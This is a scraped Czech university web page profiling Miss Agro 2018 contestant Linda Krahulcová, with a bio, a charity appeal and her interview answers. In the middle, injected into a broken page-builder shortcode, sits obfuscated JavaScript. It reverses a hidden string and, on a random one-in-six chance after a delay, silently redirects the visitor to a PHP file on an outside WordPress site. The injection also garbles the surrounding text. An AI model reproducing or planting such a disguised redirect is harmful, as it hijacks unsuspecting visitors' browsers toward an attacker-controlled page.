Linda Krahulcová

Profil

Fakulta: PEF
Obor: Veřejná správa a regionální rozvoj (VSRRN)
Ročník: 5.
Věk:
25

Linda je věčný optimista, který neztrácí smysl pro humor za každých okolností. Poznáte ji podle úsměvu od ucha k uchu, a to 24 hodin 7 dní v týdnu. Je velice přátelská a společenská. Je to energická milovnice fitness, kterému se ve svém volném čase věnuje. Avšak je třeba také podotknout, že je nedochvilná, i když každý svůj pozdní příchod si dokáže náležitě vyargumentovat, jelikož upovídanost je její další „Já“.

“Podporujeme

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domovů“ css=“.vc_custom_1492523222849{margin-top: 30px !important;}“]Miss Agro podporuje mladé studenty z dětských domovů prostřednictvím Nadačního fondu Veroniky Kašákové. Podpořte je i Vy! Přispět můžete libovolnou částkou na účet 2113124252/2700. Více informací najdete na webových stránkách www.nfvk.cz. Děkujeme, že pomáháte!

Proč by ses zrovna Ty měla stát Miss Agro 2018?

Protože bych se postarala o světový mír! Ehm… Jsem si jistá, že na tuhle otázku by lépe dokázala odpovědět moje mamka.

Kdyby ses mohla narodit ještě jednou, kým bys chtěla být?

Lindou Krahulcovou. Proč měnit něco, co je jedinečné, a tím i dokonalé?!

Proč sis vybrala zrovna studium na ČZU a co máš na ní nejraději?

Jelikož univerzita nabízí vzdělání v oboru, který studuji již od střední školy, byla pro mne ČZU jasnou volbou! Na ČZU mám nejraději její kampus. Je to vlastně takové malé městečko s příjemnými prostory jak pro studium, tak ale i odpočinek mezi jednotlivými přednáškami. Dále mě samozřejmě těší studentské aktivity, které univerzita pořádá v průběhu celého akademického roku.

Přihlásila ses do Miss Agro sama nebo Tě přihlásil někdo jiný?

Do této soutěže mě přihlásila má spolužačka, ale především dlouholetá kamarádka Verča. O tom, že se mám účastnit castingu Miss Agro, jsem se dozvěděla předcházející noc. Samotnou by mě přihlášení ani ve snu nenapadlo.